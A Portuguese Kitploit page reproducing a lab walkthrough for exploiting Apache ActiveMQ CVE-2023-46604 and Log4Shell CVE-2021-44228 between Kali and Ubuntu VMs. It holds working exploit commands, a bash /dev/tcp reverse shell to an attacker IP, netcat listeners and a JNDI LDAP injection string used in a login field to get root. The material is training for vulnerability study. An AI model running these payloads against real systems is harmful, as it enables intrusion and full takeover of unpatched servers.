Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-Lab — Instruções para explorar as vulnerabilidades CVE-2021-44228 e CVE-2023-46604 | Kitploit
Ferramentas/GitHubGitHub/dcm2406/cve-lab
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubdcm2406/cve-lab

CVE-Lab

Instruções para explorar as vulnerabilidades CVE-2021-44228 e CVE-2023-46604

Ver Repositório
24há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-46604 Laboratório

Este laboratório orienta sobre como explorar vulnerabilidades do CVE-2023-46604

Agradecimentos

  • Apache ActiveMQ
  • CVE-2023-46604

Ambiente

Este laboratório requer a instalação de 2 máquinas virtuais. Uma máquina Kali Linux versão 2023.4 e uma máquina Ubuntu versão 22.04.3 LTS. Você pode baixá-las aqui:

  • Kali Linux 2023.4
  • Ubuntu 22.04.3 LTS
  • VMware-workstation-17.5.0 para windows
  • VMware-workstation-17.5.0 para linux

Modelo e requisitos de sistema

Na máquina Kali Linux:

Instalar o git

root@kitploit:~
$sudo apt install git

Instalar o gedit

root@kitploit:~
$sudo apt install gedit

Na máquina Ubuntu:

Instalar o git

root@kitploit:~
$sudo apt install git

Instalar o openjdk 18

root@kitploit:~
$sudo apt install openjdk-18-jdk

Instalar o pacote ActiveMQ 5.18.2

root@kitploit:~
$sudo su
$git clone https://github.com/dcm2406/ApacheActiveMQ
$cd ApacheActiveMQ/
$tar -xf apache-activemq-5.18.2-bin.tar.gz

Construindo o servidor (iniciar o serviço activemq)

Na máquina Ubuntu Abra uma janela de terminal e execute o comando abaixo:

root@kitploit:~
$sudo su
$cd ApacheActiveMQ/apache-activemq-5.18.2/bin/linux-x86-64
$./activemq start

Verifique o status do serviço:

root@kitploit:~
$./activemq status

Se o serviço iniciar com sucesso, ele exibirá na tela do terminal "ActiveMQ Brocker is running".

Você também pode visitar http://127.0.0.1:8161 para abrir o gerenciador do broker ActiveMQ. Ele inclui o hostname, versão, ID, tempo de atividade e algumas outras informações.

Exploração

Na máquina Kali Linux

Baixe os recursos para o processo de exploração:

root@kitploit:~
$sudo su
$git clone https://github.com/dcm2406/CVE-2023-46604
$cd CVE-2023-46604
$ls

Como você pode ver, temos 2 arquivos exploit.py e poc.xml:

  • O arquivo poc.xml contém um trecho de código malicioso que aproveita uma vulnerabilidade no protocolo OpenWire.
  • O arquivo exploit.py é responsável por criptografar por HTTP e enviar o arquivo poc.xml para o Brocker na máquina alvo. Abra um servidor web no caminho dos recursos:
root@kitploit:~
$cd CVE-2023-46604
$python3 -m http.server

Abra uma nova janela de terminal para enviar o arquivo poc.xml ao servidor alvo por meio do arquivo exploit.py:

root@kitploit:~
$sudo su
$cd CVE-2023-46604
$python3 exploit.py -i 192.168.132.135 -p 61616 --xml http://192.168.132.130:8000/poc.xml

Após o comando ser executado, o aplicativo Calculadora é iniciado na máquina alvo. Isso prova que a vulnerabilidade foi explorada com sucesso. Continuamos a criar um reverse shell para controlar a máquina alvo.

Abra uma nova janela de terminal para ouvir conexões de reverse shell:

root@kitploit:~
$sudo su
$nc -nlvp 4444

Volte ao terminal anterior e edite o arquivo poc.xml:

root@kitploit:~
$gedit poc.xml

Substitua o valor gnome-calculator por bash -i >& /dev/tcp/192.168.132.130/4444 0>&1 e salve o arquivo.

Enviando o código malicioso novamente:

root@kitploit:~
$python3 exploit.py -i 192.168.132.135 -p 61616 --xml http://192.168.132.130:8000/poc.xml

O resultado desse comando é que obtivemos o shell root na máquina alvo. ROOTED!!!

CVE-2021-44228 Laboratório

Agradecimentos

  • Apache log4j
  • CVE-2023-44228 - log4shell

Ambiente

Este laboratório requer a instalação de 2 máquinas virtuais. Máquina Kali Linux versão 2023.4 e máquina Ubuntu versão 22.04.3 LTS. Você pode baixá-las aqui:

  • Kali Linux 2023.4
  • Ubuntu 22.04.3 LTS
  • VMware-workstation-17.5.0 para windows
  • VMware-workstation-17.5.0 para linux

Modelo e requisitos de sistema

Na máquina Kali Linux:

Instalar o git

root@kitploit:~
$sudo apt install git

Instalar o gedit

root@kitploit:~
$sudo apt install gedit

Na máquina Ubuntu:

Instalar o git

root@kitploit:~
$sudo apt install git

Instalar o docker

root@kitploit:~
$sudo apt install docker.io 

Construindo o servidor web

Na máquina Ubuntu

Passo 1: Baixar o openjdk

root@kitploit:~
$sudo su
$wget https://www.cs.ait.ac.th/~marikhu/installers/jdk-8u20-linux-x64.tar.gz
$tar -xf jdk-8u20-linux-x64.tar.gz

Passo 2: Baixar e construir o docker file

root@kitploit:~
$sudo su
$git clone https://github.com/dcm2406/web-server-cve44228
root@kitploit:~
$docker build -t cve44228
$docker run --network host cve44228

Após concluir os comandos acima, temos um site. Para navegar na web, você pode usar a URL: http://<ubuntu_ip>:8080. Neste tutorial, o endereço será semelhante a: http://192.168.132.135:8080

Exploração

Na máquina Kali Linux, baixe os recursos necessários para explorar a vulnerabilidade

Baixar o poc

root@kitploit:~
$sudo su
$git clone https://github.com/kozmer/log4j-shell-poc
$pip install -r requirement.txt

Baixar o openjdk

root@kitploit:~
$sudo su
$wget https://www.cs.ait.ac.th/~marikhu/installers/jdk-8u20-linux-x64.tar.gz

//move the openjdk file to the directory containing the poc file
$mv jdk-8u20-linux-x64.tar.gz <path to the directory containing the poc file>

$tar -xf jdk-8u20-linux-x64.tar.gz   //unzip the file

Abra um novo terminal para ouvir conexões de reverse shell:

root@kitploit:~
$sudo su
$nc -nlvp 9001

Inicie os serviços LDAP e HTTP com o arquivo poc

root@kitploit:~
$sudo su
$cd log4j-shell-poc
$python3 poc.py --userip 192.168.132.130 --lport 9001 --webport 8080

O comando retornará resultados semelhantes aos seguintes

root@kitploit:~
[!] CVE: CVE-2021-44228
Github repo: https://github.com/kozmer/log4j-shell-poc

[+] Exploit java class created success
[+] Setting up LDAP server

[+] Send me: ${jndi:ldap://192.168.132.130:1389/a}

[+] Starting Webserver on port 8080 http://0.0.0.0:8080
Listening on 0.0.0.0:1389

Aqui, estamos interessados apenas no valor jndi gerado. Abra um navegador web e entre no endereço do site que você criou anteriormente. Faça login usando o valor jndi. Nesse momento, o terminal do netcat recebe uma conexão. ROOTED!!!

Documentação

Relatório de Pesquisa CVE

Suporte

Para suporte, envie um e-mail para [email protected]

Autores

  • @dcm2406
  • @tCu0n9
Baixar ferramenta